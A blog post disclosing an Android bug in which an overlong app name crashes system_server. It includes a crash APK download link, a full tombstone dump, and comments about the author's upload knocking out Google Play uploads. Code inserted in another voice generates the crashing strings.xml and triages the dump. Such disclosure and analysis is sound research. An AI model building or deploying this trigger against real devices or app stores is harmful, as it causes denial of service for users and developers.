Android OS Memory Corruption Bug


Update:
This vulnerability caused a denial of service on Google Play: nobody could upload an APK for two days. More info:

http://ibrahimbalic.com/2014/android-vulnerability-affected-google-play-bouncer-emulator/


Hi guys,

This week I spent time fuzzing Android (both the tools and the OS) and found an Android OS memory corruption bug and a buffer overflow in Android Debug Bridge (adb.exe).

The OS bug corrupts memory and takes the Android OS down. As the crash dump below shows, the fault lands in the WindowManager thread of system_server, so the whole framework goes down with it.

I tested on Android 4.2.2, 4.3 and 2.3; the result was the same on every attempt.

The trigger is the length of the application name ("appname"). Set app_name in strings.xml to a very long value (387,000+ characters) and the bug fires.

If you want to test it, install this app and run it on your Android device.

download apk
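To reproduce the trigger without the prebuilt APK, and to check your own resources for it, here is an added example (my code, not the post's or the APK's). It writes a strings.xml whose app_name has the reported length, and a scanner that flags oversized <string> resources in source strings.xml files, the kind of check a build or pre-upload pipeline could run. The manifest reference android:label="@string/app_name", the 4096-character limit used by the check, and the fill character are assumptions for illustration; the 387,000 figure is the post's.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Threshold reported in the post: an app name of 387000+ characters triggers the crash.
TRIGGER_LEN = 387_000


def build_strings_xml(app_name_len: int, fill: str = "a") -> str:
    """Return res/values/strings.xml text whose app_name is app_name_len characters long.

    Assumption: the manifest references it as android:label="@string/app_name".
    The value is XML-escaped so a fill character like '<' still yields a valid file.
    """
    name = fill * app_name_len
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<resources>\n"
        f'    <string name="app_name">{escape(name)}</string>\n'
        "</resources>\n"
    )


def oversized_strings(xml_text: str, limit: int) -> dict:
    """Return {resource name: length} for every <string> whose value exceeds limit.

    Defensive side of the same issue: run it over res/values/*.xml before building
    or uploading. Assumption: you have the source resources, not only the compiled
    resources.arsc inside an APK.
    """
    root = ET.fromstring(xml_text)
    found = {}
    for elem in root.iter("string"):
        value = "".join(elem.itertext())  # text plus any inline formatting children
        if len(value) > limit:
            found[elem.get("name")] = len(value)
    return found


if __name__ == "__main__":
    xml_text = build_strings_xml(TRIGGER_LEN)
    print(len(xml_text), "bytes of strings.xml")
    print(oversized_strings(xml_text, limit=4096))  # hypothetical limit for the check
```

Drop the generated file into res/values/ of an otherwise empty project, build, and install; the scanner is the inverse operation and reports {'app_name': 387000} on the same file.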


I/DEBUG (12909): pid: 13049, tid: 13079, name: WindowManager >>> system_server <<<
I/DEBUG (12909): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 5fbfe000
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): r4 601fdbf0 r5 5fb771d8 r6 5c6a5af8 r7 5c19ea88
I/DEBUG (12909): r8 00000000 r9 001a1a80 sl 00000000 fp 42375618
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909): d0 4100000041000000 d1 4100000041000000
I/DEBUG (12909): d2 4100000041000000 d3 4100000041000000
I/DEBUG (12909): d4 4100000041000000 d5 4100000041000000
I/DEBUG (12909): d6 4100000041000000 d7 4100000041000000
I/DEBUG (12909): d8 c3a00000c3a00000 d9 3f80000044340000
I/DEBUG (12909): d10 430500003f800000 d11 3fcdd94742960000
I/DEBUG (12909): d12 4000000000000000 d13 3f0000003f3bb28f
I/DEBUG (12909): d14 000000003f3bb28f d15 0000000000000000
I/DEBUG (12909): d16 0000903cb0e16900 d17 7fffffffffffffff
I/DEBUG (12909): d18 0000000000000000 d19 0000000000000000
I/DEBUG (12909): d20 0000000000000000 d21 397377ce858a5d48
I/DEBUG (12909): d22 3fa555555555554c d23 bcb1a62633145c07
I/DEBUG (12909): d24 3fc55546b2662d7e d25 3fefd70a40000000
I/DEBUG (12909): d26 3fd5555c80ffa191 d27 3fdb6dbfa3a1ea05
I/DEBUG (12909): d28 3fe33338d877fab4 d29 bf747ae000000000
I/DEBUG (12909): d30 3fffeb8500000000 d31 0000000000000000
I/DEBUG (12909): scr 60000010
I/DEBUG (12909):
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909):
I/DEBUG (12909): stack:
I/DEBUG (12909): 5fb77150 5c6a5b14
I/DEBUG (12909): 5fb77154 5c6a5b18
I/DEBUG (12909): 5fb77158 5fb771a4
I/DEBUG (12909): 5fb7715c 401d1885 /system/lib/libandroid_runtime.so (android::TextLayoutEngine::getValue(SkPaint const*, unsigned short const*, int, int, int, int)+104)
I/DEBUG (12909): 5fb77160 00000000
I/DEBUG (12909): 5fb77164 001a1a80
I/DEBUG (12909): 5fb77168 001a1a80
I/DEBUG (12909): 5fb7716c 00000000
I/DEBUG (12909): 5fb77170 601fdbf0
I/DEBUG (12909): 5fb77174 5fb771d8
I/DEBUG (12909): 5fb77178 42375618 /dev/ashmem/dalvik-heap (deleted)
I/DEBUG (12909): 5fb7717c 5c19ea88
I/DEBUG (12909): 5fb77180 00000000
I/DEBUG (12909): 5fb77184 001a1a80
I/DEBUG (12909): 5fb77188 df0027ad
I/DEBUG (12909): 5fb7718c 00000000
I/DEBUG (12909): #00 5fb77190 00000000
I/DEBUG (12909): 5fb77194 001a1a80
I/DEBUG (12909): #01 5fb77198 001a1a80
I/DEBUG (12909): 5fb7719c 00000000
I/DEBUG (12909): 5fb771a0 00000000
I/DEBUG (12909): 5fb771a4 5c6a5af8
I/DEBUG (12909): 5fb771a8 00000000
I/DEBUG (12909): 5fb771ac 5d28ec10
I/DEBUG (12909): 5fb771b0 001a1a80
I/DEBUG (12909): 5fb771b4 00000000
I/DEBUG (12909): 5fb771b8 601fdbe0
I/DEBUG (12909): 5fb771bc 00000000
I/DEBUG (12909): 5fb771c0 001a1a80
I/DEBUG (12909): 5fb771c4 401cd64d /system/lib/libandroid_runtime.so
I/DEBUG (12909): 5fb771c8 001a1a80
I/DEBUG (12909): 5fb771cc 00000000
I/DEBUG (12909): 5fb771d0 5fb771d8
I/DEBUG (12909): 5fb771d4 601fdbf0
I/DEBUG (12909):
I/DEBUG (12909): memory near r0:
I/DEBUG (12909): 5fbfdfb8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfc8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfd8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdfe8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fbfdff8 41000000 41000000 00000000 00000000 ...A...A........
I/DEBUG (12909):
I/DEBUG (12909): memory near r1:
I/DEBUG (12909): 6584ae38 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae48 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae58 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae68 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 6584ae78 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near r2:
I/DEBUG (12909): 005ffb60 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb70 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb80 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffb90 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 005ffba0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near r3:
I/DEBUG (12909): 3acb31a0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31b0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31c0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31d0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 3acb31e0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near r4:
I/DEBUG (12909): 601fdbd0 00000000 407d61a8 42375608 bb700005 .....a}@.V7B..p.
I/DEBUG (12909): 601fdbe0 407d64fc 5fb771d8 4013aa4c 5c19ea88 .d}@.q._L..@...\
I/DEBUG (12909): 601fdbf0 00000000 9477d17e bb700005 5d28ec10 ....~.w...p...(]
I/DEBUG (12909): 601fdc00 42375618 bb700005 5c19ea88 00000000 .V7B..p....\....
I/DEBUG (12909): 601fdc10 00000000 001a1a80 00000000 401cd7cf ...............@
I/DEBUG (12909):
I/DEBUG (12909): memory near r5:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d ...`........M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 .........q._...`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near r6:
I/DEBUG (12909): 5c6a5ad8 00000000 00000000 00000000 00000000 ................
I/DEBUG (12909): 5c6a5ae8 00000000 00000000 00000000 00000043 ............C...
I/DEBUG (12909): 5c6a5af8 40200e80 5c89c6c0 40200ea0 657c4018 .. @...\.. @.@|e
I/DEBUG (12909): 5c6a5b08 001a1a80 00000007 00000004 4b50d400 ..............PK
I/DEBUG (12909): 5c6a5b18 40200ee8 65e4b018 001a1a80 00000007 .. @...e........
I/DEBUG (12909):
I/DEBUG (12909): memory near r7:
I/DEBUG (12909): 5c19ea68 00000000 00000040 00000010 00000010 ....@...........
I/DEBUG (12909): 5c19ea78 00040006 001e0103 00000038 00000053 ........8...S...
I/DEBUG (12909): 5c19ea88 40b36f80 41600000 3f800000 00000000 .o.@..`A...?....
I/DEBUG (12909): 5c19ea98 00000000 00000000 00000000 00000000 ................
I/DEBUG (12909): 5c19eaa8 00000000 00000000 5c542620 00000000 ........ &T\....
I/DEBUG (12909):
I/DEBUG (12909): memory near r9:
I/DEBUG (12909): 001a1a60 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a70 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a80 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1a90 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909): 001a1aa0 ffffffff ffffffff ffffffff ffffffff ................
I/DEBUG (12909):
I/DEBUG (12909): memory near fp:
I/DEBUG (12909): 423755f8 40c9fc88 00000000 40cbf9f8 0034351b ...@.......@.54.
I/DEBUG (12909): 42375608 40c39928 00000000 001a1a80 00000000 (..@............
I/DEBUG (12909): 42375618 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375628 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909): 42375638 00610061 00610061 00610061 00610061 a.a.a.a.a.a.a.a.
I/DEBUG (12909):
I/DEBUG (12909): memory near ip:
I/DEBUG (12909): 5fb771b8 601fdbe0 00000000 001a1a80 401cd64d ...`........M..@
I/DEBUG (12909): 5fb771c8 001a1a80 00000000 5fb771d8 601fdbf0 .........q._...`
I/DEBUG (12909): 5fb771d8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771e8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909): 5fb771f8 41000000 41000000 41000000 41000000 ...A...A...A...A
I/DEBUG (12909):
I/DEBUG (12909): memory near sp:
I/DEBUG (12909): 5fb77170 601fdbf0 5fb771d8 42375618 5c19ea88 ...`.q._.V7B...\
I/DEBUG (12909): 5fb77180 00000000 001a1a80 df0027ad 00000000 .........'......
I/DEBUG (12909): 5fb77190 00000000 001a1a80 001a1a80 00000000 ................
I/DEBUG (12909): 5fb771a0 00000000 5c6a5af8 00000000 5d28ec10 .....Zj\......(]
I/DEBUG (12909): 5fb771b0 001a1a80 00000000 601fdbe0 00000000 ...........`....
I/DEBUG (12909):
I/DEBUG (12909): code around pc:
I/DEBUG (12909): 400f81f0 f5d1f020 ba000007 f5d1f040 f5d1f060  .......@...`...
I/DEBUG (12909): 400f8200 ecb10b10 f5d1f040 f5d1f060 e2522040 ....@...`...@ R.
I/DEBUG (12909): 400f8210 eca00b10 aafffff9 e2922040 0a00000f ........@ ......
I/DEBUG (12909): 400f8220 e3520008 ba000004 ecb10b02 e2422008 ..R.......... B.
I/DEBUG (12909): 400f8230 e3520008 eca00b02 aafffffa e3120004 ..R.............
I/DEBUG (12909):
I/DEBUG (12909): code around lr:
I/DEBUG (12909): 401d05f0 46339303 980e4601 a8059002 f90ef001 ..3F.F..........
I/DEBUG (12909): 401d0600 b14e9e05 6932b12d 68f14628 f7c60092 ..N.-.2i(F.h....
I/DEBUG (12909): 401d0610 b10cea36 602169f1 f7d8a805 b007fb89 6....i!`........
I/DEBUG (12909): 401d0620 83f0e8bd b087b5f0 460d4616 4604461f .........F.F.F.F
I/DEBUG (12909): 401d0630 ff2af7e8 46222300 0048e88d 9602462b ..*..#"F..H.+F..
I/DEBUG (12909):
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000
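Reading the tombstone above mechanically rather than by eye: the following is an added example (my code, not the post's), a small triage script that parses the header, signal, register and memory-map lines copied from the dump above and asks where the store pointer (r0), the stack pointer and the fault address fall. Treating r0, r1 and r2 as destination, source and remaining byte count comes from the "code around pc" block, which decodes to a vldmia r1!, {d0-d7} / vstmia r0!, {d0-d7} / subs r2, r2, #64 loop (a 64-bytes-per-iteration copy in /system/lib/libc.so); the dict keys and the "single page with SEGV_ACCERR looks like a guard page" heuristic are my assumptions.

```python
import re

# Lines copied from the tombstone printed above (the post's own dump, not
# constructed), reduced to the parts the triage needs.
TOMBSTONE = """\
I/DEBUG (12909): pid: 13049, tid: 13079, name: WindowManager >>> system_server <<<
I/DEBUG (12909): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 5fbfe000
I/DEBUG (12909): r0 5fbfdfd8 r1 6584ae58 r2 005ffb80 r3 3acb31c0
I/DEBUG (12909): r4 601fdbf0 r5 5fb771d8 r6 5c6a5af8 r7 5c19ea88
I/DEBUG (12909): r8 00000000 r9 001a1a80 sl 00000000 fp 42375618
I/DEBUG (12909): ip 5fb771d8 sp 5fb77190 lr 401d0613 pc 400f8210 cpsr 20000010
I/DEBUG (12909): backtrace:
I/DEBUG (12909): #00 pc 0000e210 /system/lib/libc.so
I/DEBUG (12909): #01 pc 001a1a7c <unknown>
I/DEBUG (12909): memory map around fault addr 5fbfe000:
I/DEBUG (12909): 5faff000-5fbfe000
I/DEBUG (12909): 5fbfe000-5fbff000
I/DEBUG (12909): 5fbff000-5fcfe000
"""

PAGE = 0x1000
LOG_PREFIX = re.compile(r"^I/DEBUG\s*\(\d+\):\s?")
HEADER = re.compile(r"pid: (\d+), tid: (\d+), name: (\S+) >>> (\S+) <<<")
SIGNAL = re.compile(r"signal (\d+) \((\w+)\), code (\d+) \((\w+)\), fault addr ([0-9a-f]+)")
REG = re.compile(r"\b(r\d{1,2}|sl|fp|ip|sp|lr|pc|cpsr)\s+([0-9a-f]{8})\b")
MAP = re.compile(r"^([0-9a-f]{8})-([0-9a-f]{8})")


def parse_tombstone(text: str) -> dict:
    """Pull thread/process names, signal info, ARM registers and the map list out of a tombstone."""
    info = {"regs": {}, "maps": []}
    section = "regs"  # registers precede "backtrace:"; map lines follow "memory map"
    for raw in text.splitlines():
        line = LOG_PREFIX.sub("", raw).strip()
        if m := HEADER.match(line):
            info.update(pid=int(m[1]), tid=int(m[2]), thread=m[3], process=m[4])
        elif m := SIGNAL.match(line):
            info.update(signal=int(m[1]), signame=m[2], code=int(m[3]),
                        codename=m[4], fault_addr=int(m[5], 16))
        elif line.startswith("backtrace:"):
            section = "backtrace"  # stop register parsing so "#00 pc ..." cannot clobber pc
        elif line.startswith("memory map"):
            section = "maps"
        elif section == "regs":
            for name, val in REG.findall(line):
                info["regs"][name] = int(val, 16)
        elif section == "maps" and (m := MAP.match(line)):
            info["maps"].append((int(m[1], 16), int(m[2], 16)))
    return info


def region_of(maps, addr):
    """Return the (start, end) mapping containing addr, or None."""
    for lo, hi in maps:
        if lo <= addr < hi:
            return (lo, hi)
    return None


def triage(info: dict) -> dict:
    """Classify the fault: where the stack lives, where the write pointer is, what was hit."""
    regs, maps, fault = info["regs"], info["maps"], info["fault_addr"]
    stack = region_of(maps, regs["sp"])
    dst = region_of(maps, regs["r0"])
    hit = region_of(maps, fault)
    verdict = {
        "process": info["process"],
        "thread": info["thread"],
        "access_denied": info["codename"] == "SEGV_ACCERR",  # mapped, but not writable
        "fault_region_is_one_page": hit is not None and hit[1] - hit[0] == PAGE,
        "stack_region_size": stack[1] - stack[0] if stack else None,
        "dst_inside_stack_region": stack is not None and dst == stack,
        "fault_at_stack_region_end": stack is not None and fault == stack[1],
        "bytes_from_dst_to_fault": fault - regs["r0"],
        "bytes_still_to_copy": regs["r2"],  # r2 is the byte counter of the copy loop at pc
    }
    verdict["stack_overrun"] = (verdict["dst_inside_stack_region"]
                                and verdict["fault_at_stack_region_end"]
                                and verdict["access_denied"])
    return verdict


if __name__ == "__main__":
    for key, val in triage(parse_tombstone(TOMBSTONE)).items():
        print(f"{key:28} {val:#x}" if type(val) is int else f"{key:28} {val}")
```

What it reports for this dump: sp and r0 both sit in the 0xff000-byte region 5faff000-5fbfe000, r0 is 0x28 bytes below the end of that region, r2 says 0x5ffb80 bytes (about 6.3 MB) were still to be copied, and the faulting address is the first byte of a single mapped page that refused the write. That is a copy into a stack-resident buffer running off the top of the thread's stack region; the one-page region at 5fbfe000 and the equally sized region right after it are consistent with the guard page of a neighbouring thread stack. Two caveats: this debuggerd format prints no permission flags in the map excerpt, so the "not writable" conclusion rests on SEGV_ACCERR alone, and the dump does not say where the destination buffer starts (r5 and ip both point at 5fb771d8, just above sp, where the 0x41000000 run begins, which is suggestive but not proof).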

20 comments

  1. noone important says:

    So you brought down Google Play console? That's not funny

  2. ibrahimbalic says:

    I know that is not funny, but I did it only for research... and I'm sorry ;)

  3. […] This week I tried hard on Android (tools and os) by fuzzing and I found a Android OS memory corruption bugs and Android Debug Bridge (adb.exe) BOF.  […]

  4. Christian says:

    Okay, you found the bug. But why the hell did you do this upload again?
    That's crazy and really not funny, as many developers are unable to update their apps now.
    If you're that good, start helping Google investigate the problem.

    Word up!

  5. ibrahimbalic says:

    Yeah, you may be right, but things occurred spontaneously. My intention was never to harm anything or anyone; on the contrary, I'm trying my best to help ;)

  6. ibrahimbalic says:

    WoW.. it's rockin' ; )

  7. abdalrhman says:

    GooooooooooooooD ibrahim balic
    You actually deserve all the appreciation :)

  8. mirko says:

    RespecT!!! :)

  9. Tech News says:

    Malicious apps can hose Android phones, erase data, researchers warn

    Security researchers said they have uncovered bugs in Google's

  10. ibrahimbalic says:

    thanks ( :

  11. ibrahimbalic says:

    thanks

  12. ibrahimbalic says:

    thanks

  13. […] recently read about an Android system crash vulnerability affecting Google’s Bouncer™ infrastructure, one that, […]

  14. […] 4.3, and possibly many other releases of the operating system, researcher Ibrahim Balic wrote in a blog post published last week. Attackers could exploit the underlying memory corruption bug by hiding attack code in an otherwise […]

  15. […] on his site Balic made the virus available for download and the […]

  16. TOM_Harrison says:

    I have tested the apk.
    Actually that just causes the installer to read slowly or crash.
    Although I have seen something in dmesg

  17. […] a bit quickly. When Trend Micro decided to take a closer look at the research of developer Ibrahim Baliç on memory corruption in Android, it adopted the reflex of […]

  18. […] he said. Then he created an Android app to exploit the vulnerability, 'causes a possible memory corruption' and uploaded it to the Google's Developer […]